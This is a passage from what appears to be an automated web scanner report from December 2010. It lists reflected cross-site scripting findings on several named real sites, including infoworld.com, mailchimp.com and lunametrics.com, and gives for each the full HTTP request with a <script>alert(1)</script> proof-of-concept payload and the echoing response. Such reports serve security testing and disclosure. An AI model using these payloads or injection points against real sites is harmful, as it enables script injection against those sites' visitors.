GET /internet/wwsites.nsf/vwWebPublished5d6f7<script>alert(1)</script>f6dba030f35/sol_explore-precision-marketing_us HTTP/1.1 Host: www.infoprint.com Proxy-Connection: keep-alive Referer: http://www.infoprint.com/precisionmarketing Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 14:06:05 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 22591 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!-- @GetHTTPHeader("Host"): www.infoprint.com --> <!-- @ServerName: CN=XSW102/OU=A ...[SNIP]... <br /> URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished5d6f7<script>alert(1)</script>f6dba030f35/sol_explore-precision-marketing_us <br /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac58d<script>alert(1)</script>f03067f6e47 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_usac58d<script>alert(1)</script>f03067f6e47 HTTP/1.1 Host: www.infoprint.com Proxy-Connection: keep-alive Referer: http://www.infoprint.com/precisionmarketing Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 14:08:05 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 22516 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!-- @GetHTTPHeader("Host"): www.infoprint.com --> <!-- @ServerName: CN=XSW101/OU=A ...[SNIP]... <br /> URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished/sol_explore-precision-marketing_usac58d<script>alert(1)</script>f03067f6e47 <br /> ...[SNIP]...
2.336. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f8dc7<script>alert(1)</script>364b444742b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us?f8dc7<script>alert(1)</script>364b444742b=1 HTTP/1.1 Host: www.infoprint.com Proxy-Connection: keep-alive Referer: http://www.infoprint.com/precisionmarketing Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 14:05:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 22519 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!-- @GetHTTPHeader("Host"): www.infoprint.com --> <!-- @ServerName: CN=XSW102/OU=A ...[SNIP]... <br /> URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished/sol_explore-precision-marketing_us?f8dc7<script>alert(1)</script>364b444742b=1 <br /> ...[SNIP]...
2.337. http://www.infoprint.com/precisionmarketing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.infoprint.com
Path:
/precisionmarketing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3181b<script>alert(1)</script>0c72c958252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /precisionmarketing?3181b<script>alert(1)</script>0c72c958252=1 HTTP/1.1 Host: www.infoprint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:33:43 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 22476 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!-- @GetHTTPHeader("Host"): www.infoprint.com --> <!-- @ServerName: CN=XSW101/OU=A ...[SNIP]... <br /> URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished/sol_explore-precision-marketing_us?3181b<script>alert(1)</script>0c72c958252=1 <br /> ...[SNIP]...
2.338. http://www.infoworld.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.infoworld.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e03"><script>alert(1)</script>3e112396eea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?source=AFL-idgcom&42e03"><script>alert(1)</script>3e112396eea=1 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:34:11 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:34:11 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506451-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 82158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e55"><script>alert(1)</script>dea07337aa4 was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?source=AFL-idgcomd9e55"><script>alert(1)</script>dea07337aa4 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:33:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:33:42 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506422-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 83131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1187"><script>alert(1)</script>2b778c3617c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /de1187"><script>alert(1)</script>2b778c3617c/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:33:47 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:33:47 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506427-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49141
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9363b"><script>alert(1)</script>996c4f5d80b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /d/cloud-computing9363b"><script>alert(1)</script>996c4f5d80b/googles-stealthy-plan-get-you-microsoft-exchange-429 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:33:50 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:33:50 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506430-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49352
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efd36"%3b43914d62c2f was submitted in the REST URL parameter 2. This input was echoed as efd36";43914d62c2f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d/cloud-computingefd36"%3b43914d62c2f/googles-stealthy-plan-get-you-microsoft-exchange-429 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:33:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:33:51 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506431-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <m ...[SNIP]... <!-- var url_topic = "Cloud Computingefd36";43914d62c2f" //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac6e"><script>alert(1)</script>3dccd1b97d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-4295ac6e"><script>alert(1)</script>3dccd1b97d3 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:34:04 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:34:04 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506444-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 72017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> < ...[SNIP]... <a href="/user?destination=d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-4295ac6e"><script>alert(1)</script>3dccd1b97d3"> ...[SNIP]...
2.344. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae1d"><script>alert(1)</script>195ea8c76a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429?fae1d"><script>alert(1)</script>195ea8c76a9=1 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:33:45 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:33:45 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506425-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 87512
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f968"><script>alert(1)</script>b35de181cf was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429?source=rss_3f968"><script>alert(1)</script>b35de181cf HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:33:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Thu, 16 Dec 2010 13:33:52 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292506432-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89236
The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41caa"><script>alert(1)</script>5d3286d3257 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /utilApp/webcastcentral/index.jsp?partnerref=41caa"><script>alert(1)</script>5d3286d3257 HTTP/1.1 Host: www.insight24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:34:30 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=XTCQNKVGVn0cDtwrvQ9TDT6hHRvQFWGnQDjynvrFhVVh0M2QLM2Z!166543021!264525680; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Set-Cookie: BIGipServerinsight24prd_wl=1006764554.36131.0000; path=/ Content-Length: 40406
The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f337f"><script>alert(1)</script>4c65fffa152 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /utilApp/webcastcentral/index.jsp?partnerref=pr0409f337f"><script>alert(1)</script>4c65fffa152 HTTP/1.1 Host: www.insight24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:34:28 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=WRc2NKVGP0z51DThtgzwfFhRykk2wm1qd3XL190ycTLXNBf12Ryk!-1979069199!166543021; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Set-Cookie: BIGipServerinsight24prd_wl=2332164618.36643.0000; path=/ Content-Length: 40538
The value of the partnerref request parameter is copied into an HTML comment. The payload abc7a--><script>alert(1)</script>68a71a39411 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /utilApp/webcastcentral/index.jsp?partnerref=pr0409abc7a--><script>alert(1)</script>68a71a39411 HTTP/1.1 Host: www.insight24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:34:35 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=9dzFNKVL60hhrhlRP2LBGG1yr9V1PL7bQThjb3Wld5kq6vdh5Rqc!264525680!-1979069199; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Set-Cookie: BIGipServerinsight24prd_wl=1174536714.36387.0000; path=/ Content-Length: 40529
2.349. http://www.linuxworld.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.linuxworld.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c766'-alert(1)-'07e601c82bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2c766'-alert(1)-'07e601c82bd=1 HTTP/1.1 Host: www.linuxworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e568</script><script>alert(1)</script>7674b8630 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog2e568</script><script>alert(1)</script>7674b8630/ HTTP/1.1 Host: www.lunametrics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:35:10 GMT Server: Apache/2.2.17 Vary: Cookie X-Pingback: http://www.lunametrics.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Thu, 16 Dec 2010 13:35:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13525
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3581"><script>alert(1)</script>8af0ac2b3a4 was submitted in the REST URL parameter 1. This input was echoed as a3581\"><script>alert(1)</script>8af0ac2b3a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bloga3581"><script>alert(1)</script>8af0ac2b3a4/ HTTP/1.1 Host: www.lunametrics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:34:59 GMT Server: Apache/2.2.17 Vary: Cookie X-Pingback: http://www.lunametrics.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Thu, 16 Dec 2010 13:35:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13517
2.352. http://www.lunametrics.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lunametrics.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28042"><script>alert(1)</script>351435a158f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28042\"><script>alert(1)</script>351435a158f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?28042"><script>alert(1)</script>351435a158f=1 HTTP/1.1 Host: www.lunametrics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:34:57 GMT Server: Apache/2.2.17 Vary: Cookie X-Pingback: http://www.lunametrics.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72835
2.353. http://www.mailchimp.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mailchimp.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67aa"><script>alert(1)</script>11cbcd6f625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d67aa\"><script>alert(1)</script>11cbcd6f625 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?d67aa"><script>alert(1)</script>11cbcd6f625=1 HTTP/1.1 Host: www.mailchimp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:35:06 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.11 X-Pingback: http://www.mailchimp.com/blog/xmlrpc.php Cache-Control: max-age=604800, public Expires: Sat, 15 Jan 2011 13:35:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> ...[SNIP]... <form method="post" action="/blog/?d67aa\"><script>alert(1)</script>11cbcd6f625=1#mc_signup_form" id="mc_signup_form"> ...[SNIP]...
2.354. http://www.marketingvox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.marketingvox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81b3f</script><script>alert(1)</script>2b40ab3fc98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?81b3f</script><script>alert(1)</script>2b40ab3fc98=1 HTTP/1.1 Host: www.marketingvox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90104"><script>alert(1)</script>ba6645dcba was submitted in the REST URL parameter 1. This input was echoed as 90104\"><script>alert(1)</script>ba6645dcba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news90104"><script>alert(1)</script>ba6645dcba/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html HTTP/1.1 Host: www.minonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:35:21 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43076
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="ver ...[SNIP]... <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://datacol.accessintel.com/dcstdli4u10000oqw5j6che0b_4y1q/njs.gif?dcsuri=/news90104\"><script>alert(1)</script>ba6645dcba/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html&dcsqry=&WT.js=No" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca12"><script>alert(1)</script>f497db04a8a was submitted in the REST URL parameter 2. This input was echoed as 5ca12\"><script>alert(1)</script>f497db04a8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html5ca12"><script>alert(1)</script>f497db04a8a HTTP/1.1 Host: www.minonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:35:22 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43236
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="ver ...[SNIP]... <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://datacol.accessintel.com/dcstdli4u10000oqw5j6che0b_4y1q/njs.gif?dcsuri=/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html5ca12\"><script>alert(1)</script>f497db04a8a&dcsqry=&WT.js=No" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31c1a<script>alert(1)</script>1dd15bbf65d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html31c1a<script>alert(1)</script>1dd15bbf65d HTTP/1.1 Host: www.minonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:35:23 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43230
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="ver ...[SNIP]... <b>/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html31c1a<script>alert(1)</script>1dd15bbf65d</b> ...[SNIP]...
